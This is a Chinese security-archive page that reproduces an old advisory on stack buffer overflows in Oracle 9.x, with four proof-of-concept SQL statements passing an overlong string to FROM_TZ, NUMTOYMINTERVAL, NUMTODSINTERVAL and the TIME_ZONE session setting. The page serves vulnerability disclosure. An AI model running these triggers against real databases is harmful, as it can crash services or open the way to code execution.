Oracle 9.x – ‘Database’ / Statement Buffer Overflow

Oracle 9.x – ‘Database’ / Statement Buffer Overflow

漏洞ID 1053717 漏洞类型
发布时间 2003-02-05 更新时间 2003-02-05
图片[1]-Oracle 9.x – ‘Database’ / Statement Buffer Overflow-安全小百科CVE编号 N/A
图片[2]-Oracle 9.x – ‘Database’ / Statement Buffer Overflow-安全小百科CNNVD-ID N/A
漏洞平台 Multiple CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/23656
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/9587/info

Oracle database has been reported prone to multiple buffer overflow vulnerabilities when processing certain parameters and functions. Specifically the TIME_ZONE parameter, NUMTOYMINTERVAL, NUMTODSINTERVAL and FROM_TZ functions. Excessive data passed to any of the aforementioned parameters/statements may potentially overrun the bounds of a buffer in stack-based memory. This may result in the corruption of memory adjacent to the affected buffer, and ultimately may provide for arbitrary code execution.

SELECT FROM_TZ(TIMESTAMP '2000-03-28 08:00:00','long string here') FROM DUAL;

SELECT last_name, hire_date, salary, SUM(salary) OVER (ORDER BY hire_date RANGE NUMTOYMINTERVAL(1,'<long string here>') PRECEDING) AS t_sal FROM employees;

SELECT empno, ename, hiredate, COUNT(*) OVER (PARTITION BY empno ORDER BY hiredate RANGE NUMTODSINTERVAL(100, '<long string here>') PRECEDING) AS t_count FROM emp;

ALTER SESSION SET TIME_ZONE = '<long string here>'; SELECT CURRENT_TIMESTAMP, LOCALTIMESTAMP FROM DUAL;

相关推荐: HP HP-UX 10.34 rlpdaemon – Remote Overflow

HP HP-UX 10.34 rlpdaemon – Remote Overflow 漏洞ID 1053372 漏洞类型 发布时间 1998-07-06 更新时间 1998-07-06 CVE编号 N/A CNNVD-ID N/A 漏洞平台 Linux CVS…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享